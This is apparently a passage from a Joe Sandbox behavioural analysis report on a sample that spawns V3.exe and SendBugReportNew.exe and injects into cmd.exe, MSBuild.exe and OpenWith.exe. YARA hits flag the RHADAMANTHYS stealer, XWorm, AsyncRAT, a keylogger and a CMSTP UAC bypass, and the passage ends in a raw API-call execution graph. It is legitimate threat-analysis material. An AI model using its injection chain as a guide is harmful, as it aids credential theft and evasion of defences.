                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000002.1405996378.0000000050001000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:10
                                            Start time:12:23:32
                                            Start date:27/08/2024
                                            Path:C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe
                                            Imagebase:0xc30000
                                            File size:433'152 bytes
                                            MD5 hash:AE36397A23D16920DDFE4DFEC24F6B85
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000003.1322328519.0000000000DD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.1325910067.0000000004890000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.1325726282.0000000004670000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000000.1297243134.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000003.1326750391.0000000003E30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            Reputation:low
                                            Has exited:true

                                            Target ID:13
                                            Start time:12:23:35
                                            Start date:27/08/2024
                                            Path:C:\Windows\SysWOW64\OpenWith.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\system32\openwith.exe"
                                            Imagebase:0x630000
                                            File size:107'368 bytes
                                            MD5 hash:0ED31792A7FFF811883F80047CBCFC91
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000003.1330348319.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000D.00000003.1326989708.0000000002980000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000003.1330078113.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000D.00000002.1394467847.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:14
                                            Start time:12:23:38
                                            Start date:27/08/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                            Imagebase:0x410000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.1687453554.0000000005980000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.1687453554.0000000005980000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:15
                                            Start time:12:23:38
                                            Start date:27/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:17
                                            Start time:12:23:42
                                            Start date:27/08/2024
                                            Path:C:\Windows\System32\OpenWith.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\openwith.exe"
                                            Imagebase:0x7ff790560000
                                            File size:123'984 bytes
                                            MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000011.00000003.1440127395.000001F666561000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000011.00000003.1440280085.000001F666614000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000011.00000003.1740003326.000001F666761000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:22
                                            Start time:14:00:51
                                            Start date:27/08/2024
                                            Path:C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe"
                                            Imagebase:0x400000
                                            File size:1'312'792 bytes
                                            MD5 hash:58717509C1521EACFCC7CDA39E6BD45C
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:23
                                            Start time:14:00:52
                                            Start date:27/08/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                            Imagebase:0x410000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.1720054061.0000000003440000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.1720436187.00000000053B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000017.00000002.1720436187.00000000053B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:24
                                            Start time:14:00:52
                                            Start date:27/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:25
                                            Start time:14:00:52
                                            Start date:27/08/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            Imagebase:0x6f0000
                                            File size:262'432 bytes
                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000019.00000002.3766821762.00000000029D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Target ID:26
                                            Start time:14:00:56
                                            Start date:27/08/2024
                                            Path:C:\Program Files\Windows Media Player\wmplayer.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Windows Media Player\wmplayer.exe"
                                            Imagebase:0x7ff70d790000
                                            File size:171'008 bytes
                                            MD5 hash:89DCD2D4C0EC638AADC00D3530E07E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:27
                                            Start time:14:00:59
                                            Start date:27/08/2024
                                            Path:C:\Windows\System32\dllhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\dllhost.exe"
                                            Imagebase:0x7ff7d8730000
                                            File size:21'312 bytes
                                            MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:31
                                            Start time:14:01:03
                                            Start date:27/08/2024
                                            Path:C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe"
                                            Imagebase:0x400000
                                            File size:1'312'792 bytes
                                            MD5 hash:58717509C1521EACFCC7CDA39E6BD45C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:32
                                            Start time:14:01:03
                                            Start date:27/08/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                            Imagebase:0x410000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.1996496863.00000000052DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000020.00000002.1996496863.00000000052DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000020.00000002.1996059413.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000020.00000002.1996059413.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            Has exited:true

                                            Target ID:33
                                            Start time:14:01:03
                                            Start date:27/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:36
                                            Start time:14:01:23
                                            Start date:27/08/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            Imagebase:0x50000
                                            File size:262'432 bytes
                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000024.00000002.1997258638.0000000000152000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000024.00000002.1997258638.0000000000152000.00000002.00000001.01000000.00000000.sdmp, Author: ditekSHen
                                            Has exited:true

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:17.5%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:25.9%
                                              Total number of Nodes:1474
                                              Total number of Limit Nodes:20
                                              execution_graph 9006 410e7f 9007 410e9a 9006->9007 9008 410eb5 9007->9008 9010 40f42d 9007->9010 9011 40f445 free 9010->9011 9012 40f437 9010->9012 9013 4024e7 46 API calls 9011->9013 9012->9011 9014 40f456 9012->9014 9013->9014 9014->9008 10837 411a2d _EH_prolog 10840 4117b9 10837->10840 10839 411a61 10841 4117e9 10840->10841 10842 4117cd 10840->10842 10841->10839 10842->10841 10860 40e58f 10842->10860 10845 40e58f 47 API calls 10846 411801 10845->10846 10846->10841 10847 40e58f 47 API calls 10846->10847 10848 411813 10847->10848 10848->10841 10849 40e58f 47 API calls 10848->10849 10850 411828 10849->10850 10850->10841 10866 40e9b5 10850->10866 10852 41183d 10852->10841 10872 41168a 10852->10872 10854 411a16 10882 40ea88 10854->10882 10857 41164e _CxxThrowException 10859 4118a0 10857->10859 10858 4115a9 memmove _CxxThrowException 10858->10859 10859->10841 10859->10854 10859->10857 10859->10858 10876 4116c7 10859->10876 10861 40e59e 10860->10861 10862 40e5b9 10861->10862 10886 40e556 10861->10886 10862->10841 10862->10845 10865 4024c4 46 API calls 10865->10862 10867 40e9c4 10866->10867 10868 40e9de 10867->10868 10890 40e964 10867->10890 10868->10852 10871 4024c4 46 API calls 10871->10868 10873 411693 10872->10873 10875 4116c4 10873->10875 10894 40e63c 10873->10894 10875->10859 10877 411726 10876->10877 10878 4116df 10876->10878 10879 411709 10877->10879 10881 40e63c _CxxThrowException 10877->10881 10878->10879 10880 40e63c _CxxThrowException 10878->10880 10879->10859 10880->10879 10881->10879 10883 40ea8d 10882->10883 10884 40eaa0 10883->10884 10901 40e9f7 10883->10901 10884->10841 10889 401b1f VirtualFree 10886->10889 10888 40e561 10888->10865 10889->10888 10893 401b1f VirtualFree 10890->10893 10892 40e96e 10892->10871 10893->10892 10897 40e5d3 10894->10897 10898 40e5e1 10897->10898 10899 40e5e5 10897->10899 10898->10873 10899->10898 10900 40e60a _CxxThrowException 10899->10900 10900->10898 10902 40ea0b 10901->10902 10903 40ea30 10902->10903 10904 40ea1c memmove 10902->10904 10903->10883 10904->10903 8238 4096c7 _EH_prolog 8252 4096fa 8238->8252 8239 40971c 8240 409827 8273 40118a 8240->8273 8242 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8242->8252 8243 409851 8246 40985e ??2@YAPAXI 8243->8246 8244 40983c 8324 409425 8244->8324 8247 409878 8246->8247 8253 4098c2 8247->8253 8254 409925 ??2@YAPAXI 8247->8254 8258 409530 3 API calls 8247->8258 8260 409425 ctype 3 API calls 8247->8260 8262 4099a2 8247->8262 8267 409a65 8247->8267 8283 409fb4 8247->8283 8287 408ea4 8247->8287 8330 409c13 ??2@YAPAXI 8247->8330 8332 409f49 8247->8332 8248 40969d 8 API calls 8248->8252 8250 40e959 VirtualFree ??3@YAXPAX free free ctype 8250->8252 8252->8239 8252->8240 8252->8242 8252->8248 8252->8250 8317 4095b7 8252->8317 8321 409403 8252->8321 8327 409530 8253->8327 8254->8247 8258->8247 8260->8247 8263 409530 3 API calls 8262->8263 8264 4099c7 8263->8264 8265 409425 ctype 3 API calls 8264->8265 8265->8239 8269 409530 3 API calls 8267->8269 8270 409a84 8269->8270 8271 409425 ctype 3 API calls 8270->8271 8271->8239 8274 401198 GetDiskFreeSpaceExW 8273->8274 8275 4011ee SendMessageW 8273->8275 8274->8275 8276 4011b0 8274->8276 8277 4011d6 8275->8277 8276->8275 8278 401f9d 19 API calls 8276->8278 8277->8243 8277->8244 8279 4011c9 8278->8279 8280 407717 25 API calls 8279->8280 8281 4011cf 8280->8281 8281->8277 8282 4011e7 8281->8282 8282->8275 8284 409fdd 8283->8284 8336 409dff 8284->8336 8610 40aef3 8287->8610 8290 408ec1 8290->8247 8292 408fd5 8628 408b7c 8292->8628 8293 408f0d ??2@YAPAXI 8302 408ef5 8293->8302 8295 408f31 ??2@YAPAXI 8295->8302 8302->8292 8302->8293 8302->8295 8671 40cdb8 ??2@YAPAXI 8302->8671 8318 4095c6 8317->8318 8320 4095cc 8317->8320 8318->8252 8319 4095e2 _CxxThrowException 8319->8318 8320->8318 8320->8319 8322 40e8e2 4 API calls 8321->8322 8323 40940b 8322->8323 8323->8252 8325 40e8da ctype 3 API calls 8324->8325 8326 409433 8325->8326 8328 408963 ctype 3 API calls 8327->8328 8329 40953b 8328->8329 8331 409c45 8330->8331 8331->8247 8334 409f4e 8332->8334 8333 409f75 8333->8247 8334->8333 8335 409cde 110 API calls 8334->8335 8335->8334 8339 409e04 8336->8339 8337 409e3a 8337->8247 8339->8337 8340 409cde 8339->8340 8341 409cf8 8340->8341 8345 401626 8341->8345 8408 40db1f 8341->8408 8342 409d2c 8342->8339 8346 401642 8345->8346 8352 401638 8345->8352 8411 40a62f _EH_prolog 8346->8411 8348 40166f 8455 40eca9 8348->8455 8349 401411 2 API calls 8351 401688 8349->8351 8353 401962 ??3@YAXPAX 8351->8353 8354 40169d 8351->8354 8352->8342 8358 40eca9 VariantClear 8353->8358 8437 401329 8354->8437 8357 4016a8 8441 401454 8357->8441 8358->8352 8361 401362 2 API calls 8362 4016c7 ??3@YAXPAX 8361->8362 8367 4016d9 8362->8367 8394 401928 ??3@YAXPAX 8362->8394 8364 40eca9 VariantClear 8364->8352 8365 4016fa 8366 40eca9 VariantClear 8365->8366 8368 401702 ??3@YAXPAX 8366->8368 8367->8365 8369 401764 8367->8369 8382 401725 8367->8382 8368->8348 8372 4017a2 8369->8372 8373 401789 8369->8373 8370 40eca9 VariantClear 8371 401737 ??3@YAXPAX 8370->8371 8371->8348 8375 4017c4 GetLocalTime SystemTimeToFileTime 8372->8375 8376 4017aa 8372->8376 8374 40eca9 VariantClear 8373->8374 8377 401791 ??3@YAXPAX 8374->8377 8375->8376 8378 4017e1 8376->8378 8379 4017f8 8376->8379 8376->8382 8377->8348 8459 403354 lstrlenW 8378->8459 8446 40301a GetFileAttributesW 8379->8446 8382->8370 8384 401934 GetLastError 8384->8394 8385 401818 ??2@YAPAXI 8387 401824 8385->8387 8386 40192a 8386->8384 8483 40db53 8387->8483 8390 40190f 8393 40eca9 VariantClear 8390->8393 8391 40185f GetLastError 8486 4012f7 8391->8486 8393->8394 8394->8364 8395 401871 8396 403354 86 API calls 8395->8396 8399 40187f ??3@YAXPAX 8395->8399 8397 4018cc 8396->8397 8397->8399 8401 40db53 2 API calls 8397->8401 8400 40189c 8399->8400 8402 40eca9 VariantClear 8400->8402 8403 4018f1 8401->8403 8404 4018aa ??3@YAXPAX 8402->8404 8405 4018f5 GetLastError 8403->8405 8406 401906 ??3@YAXPAX 8403->8406 8404->8348 8405->8399 8406->8390 8602 40da56 8408->8602 8412 40a738 8411->8412 8413 40a66a 8411->8413 8414 40a687 8412->8414 8415 40a73d 8412->8415 8413->8414 8416 40a704 8413->8416 8417 40a679 8413->8417 8423 40a6ad 8414->8423 8515 40a3b0 8414->8515 8420 40a747 8415->8420 8422 40a699 8415->8422 8424 40a6f2 8415->8424 8416->8423 8489 40e69c 8416->8489 8418 40a67e 8417->8418 8417->8424 8427 40a684 8418->8427 8435 40a6b2 8418->8435 8420->8424 8420->8435 8422->8423 8503 40ed59 8422->8503 8498 40ecae 8423->8498 8511 40ed34 8424->8511 8426 40a71a 8492 40eced 8426->8492 8427->8414 8427->8422 8433 40eca9 VariantClear 8434 40166b 8433->8434 8434->8348 8434->8349 8435->8423 8507 40ed79 8435->8507 8438 401340 8437->8438 8439 40112b 2 API calls 8438->8439 8440 40134b 8439->8440 8440->8357 8442 4012f7 2 API calls 8441->8442 8443 401462 8442->8443 8530 4013e2 8443->8530 8445 40146d 8445->8361 8447 403037 8446->8447 8453 401804 8446->8453 8448 403048 8447->8448 8449 40303b SetLastError 8447->8449 8450 403051 8448->8450 8452 40305f FindFirstFileW 8448->8452 8448->8453 8449->8453 8533 402fed 8450->8533 8452->8450 8454 403072 FindClose CompareFileTime 8452->8454 8453->8384 8453->8385 8453->8386 8454->8450 8454->8453 8456 40ec65 8455->8456 8457 40ec86 VariantClear 8456->8457 8458 40ec9d 8456->8458 8457->8352 8458->8352 8460 4024fc 2 API calls 8459->8460 8461 403375 8460->8461 8462 40112b 2 API calls 8461->8462 8465 403385 8461->8465 8462->8465 8464 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8466 4033e8 8464->8466 8467 4033f2 8464->8467 8465->8464 8474 403477 8465->8474 8574 401986 CreateDirectoryW 8465->8574 8468 40301a 22 API calls 8466->8468 8469 401986 4 API calls 8467->8469 8479 4033f8 ??3@YAXPAX 8467->8479 8468->8467 8482 403405 8469->8482 8470 4034a7 8471 407776 55 API calls 8470->8471 8477 4034b1 ??3@YAXPAX 8471->8477 8472 40340a 8580 407776 8472->8580 8474->8470 8474->8479 8475 40346b ??3@YAXPAX 8480 4034bc 8475->8480 8476 40341d memcpy 8476->8482 8477->8480 8479->8480 8480->8382 8481 401986 4 API calls 8481->8482 8482->8472 8482->8475 8482->8476 8482->8481 8599 40db3c 8483->8599 8487 40112b 2 API calls 8486->8487 8488 401311 8487->8488 8488->8395 8490 4012f7 2 API calls 8489->8490 8491 40e6a9 8490->8491 8491->8426 8519 40ecd7 8492->8519 8495 40ed12 8496 40a726 ??3@YAXPAX 8495->8496 8497 40ed17 _CxxThrowException 8495->8497 8496->8423 8497->8496 8522 40ec65 8498->8522 8500 40ecba 8501 40a7b2 8500->8501 8502 40ecbe memcpy 8500->8502 8501->8433 8502->8501 8504 40ed62 8503->8504 8505 40ed67 8503->8505 8506 40ecd7 VariantClear 8504->8506 8505->8423 8506->8505 8508 40ed82 8507->8508 8509 40ed87 8507->8509 8510 40ecd7 VariantClear 8508->8510 8509->8423 8510->8509 8512 40ed42 8511->8512 8513 40ed3d 8511->8513 8512->8423 8514 40ecd7 VariantClear 8513->8514 8514->8512 8516 40a3c2 8515->8516 8517 40a3de 8516->8517 8526 40eda0 8516->8526 8517->8423 8520 40eca9 VariantClear 8519->8520 8521 40ecdf SysAllocString 8520->8521 8521->8495 8521->8496 8523 40ec6d 8522->8523 8524 40ec86 VariantClear 8523->8524 8525 40ec9d 8523->8525 8524->8500 8525->8500 8527 40edae 8526->8527 8528 40eda9 8526->8528 8527->8517 8529 40ecd7 VariantClear 8528->8529 8529->8527 8531 401398 2 API calls 8530->8531 8532 4013f2 8531->8532 8532->8445 8539 402c86 8533->8539 8535 402ff6 8536 403017 8535->8536 8537 402ffb GetLastError 8535->8537 8536->8453 8538 403006 8537->8538 8538->8453 8540 402c93 GetFileAttributesW 8539->8540 8541 402c8f 8539->8541 8542 402ca4 8540->8542 8543 402ca9 8540->8543 8541->8535 8542->8535 8544 402cc7 8543->8544 8545 402cad SetFileAttributesW 8543->8545 8550 402b79 8544->8550 8547 402cc3 8545->8547 8548 402cba DeleteFileW 8545->8548 8547->8535 8548->8535 8551 4024fc 2 API calls 8550->8551 8552 402b90 8551->8552 8553 40254d 2 API calls 8552->8553 8554 402b9d FindFirstFileW 8553->8554 8555 402c55 SetFileAttributesW 8554->8555 8570 402bbf 8554->8570 8557 402c60 RemoveDirectoryW 8555->8557 8558 402c78 ??3@YAXPAX 8555->8558 8556 401329 2 API calls 8556->8570 8557->8558 8559 402c6d ??3@YAXPAX 8557->8559 8560 402c80 8558->8560 8559->8560 8560->8535 8562 40254d 2 API calls 8562->8570 8563 402c24 SetFileAttributesW 8563->8558 8567 402c2d DeleteFileW 8563->8567 8564 402bef lstrcmpW 8565 402c05 lstrcmpW 8564->8565 8566 402c38 FindNextFileW 8564->8566 8565->8566 8565->8570 8568 402c4e FindClose 8566->8568 8566->8570 8567->8570 8568->8555 8569 402b79 2 API calls 8569->8570 8570->8556 8570->8558 8570->8562 8570->8563 8570->8564 8570->8566 8570->8569 8571 401429 8570->8571 8572 401398 2 API calls 8571->8572 8573 401433 8572->8573 8573->8570 8575 4019c7 8574->8575 8576 401997 GetLastError 8574->8576 8575->8465 8577 4019b1 GetFileAttributesW 8576->8577 8579 4019a6 8576->8579 8577->8575 8577->8579 8578 4019a7 SetLastError 8578->8465 8579->8575 8579->8578 8581 401f9d 19 API calls 8580->8581 8582 40778a wvsprintfW 8581->8582 8583 407859 8582->8583 8584 4077ab GetLastError FormatMessageW 8582->8584 8587 4076a8 25 API calls 8583->8587 8585 4077d9 FormatMessageW 8584->8585 8586 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8584->8586 8585->8583 8585->8586 8591 4076a8 8586->8591 8590 407865 8587->8590 8590->8479 8592 407715 ??3@YAXPAX LocalFree 8591->8592 8593 4076b7 8591->8593 8592->8590 8594 40661a 2 API calls 8593->8594 8595 4076c6 IsWindow 8594->8595 8596 4076ef 8595->8596 8597 4076dd IsBadReadPtr 8595->8597 8598 4073d1 21 API calls 8596->8598 8597->8596 8598->8592 8600 40db1f 2 API calls 8599->8600 8601 401857 8600->8601 8601->8390 8601->8391 8607 40d985 8602->8607 8605 40da65 CreateFileW 8606 40da8a 8605->8606 8606->8342 8608 40d98f FindCloseChangeNotification 8607->8608 8609 40d99a 8607->8609 8608->8609 8609->8605 8609->8606 8611 40af0c 8610->8611 8626 408ebd 8610->8626 8611->8626 8701 40ac7a 8611->8701 8613 40af3f 8614 40ac7a 7 API calls 8613->8614 8615 40b0cb 8613->8615 8619 40af96 8614->8619 8617 40e959 ctype 4 API calls 8615->8617 8616 40afbd 8708 40e959 8616->8708 8617->8626 8619->8615 8619->8616 8620 40b043 8621 40e959 ctype 4 API calls 8620->8621 8624 40b07f 8621->8624 8622 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8623 40afc6 8622->8623 8623->8620 8623->8622 8625 40e959 ctype 4 API calls 8624->8625 8625->8626 8626->8290 8627 4065ea InitializeCriticalSection 8626->8627 8627->8302 8720 4086f0 8628->8720 8672 40cdc7 8671->8672 8673 408761 4 API calls 8672->8673 8674 40cdde 8673->8674 8674->8302 8702 40e8da ctype 3 API calls 8701->8702 8703 40ac86 8702->8703 8712 40e811 8703->8712 8705 40aca2 8705->8613 8706 409403 4 API calls 8707 40ac90 8706->8707 8707->8705 8707->8706 8709 40e93b 8708->8709 8710 40e8da ctype 3 API calls 8709->8710 8711 40e943 ??3@YAXPAX 8710->8711 8711->8623 8713 40e8a5 8712->8713 8714 40e824 8712->8714 8713->8707 8715 40e833 _CxxThrowException 8714->8715 8716 40e863 ??2@YAPAXI 8714->8716 8717 40e895 ??3@YAXPAX 8714->8717 8715->8714 8716->8714 8718 40e879 memcpy 8716->8718 8717->8713 8718->8717 8721 40e8da ctype 3 API calls 8720->8721 8722 4086f8 8721->8722 8723 40e8da ctype 3 API calls 8722->8723 8724 408700 8723->8724 8725 40e8da ctype 3 API calls 8724->8725 8726 408708 8725->8726 9015 40dace 9018 40daac 9015->9018 9021 40da8f 9018->9021 9022 40da56 2 API calls 9021->9022 9023 40daa9 9022->9023 9005 40dadc ReadFile 9024 411def __set_app_type __p__fmode __p__commode 9025 411e5e 9024->9025 9026 411e72 9025->9026 9027 411e66 __setusermatherr 9025->9027 9036 411f66 _controlfp 9026->9036 9027->9026 9029 411e77 _initterm __getmainargs _initterm 9030 411ecb GetStartupInfoA 9029->9030 9032 411eff GetModuleHandleA 9030->9032 9037 4064af _EH_prolog 9032->9037 9036->9029 9040 404faa 9037->9040 9345 401b37 GetModuleHandleW CreateWindowExW 9040->9345 9043 404fdc 9044 40648e MessageBoxA 9043->9044 9046 404ff6 9043->9046 9045 4064a5 exit _XcptFilter 9044->9045 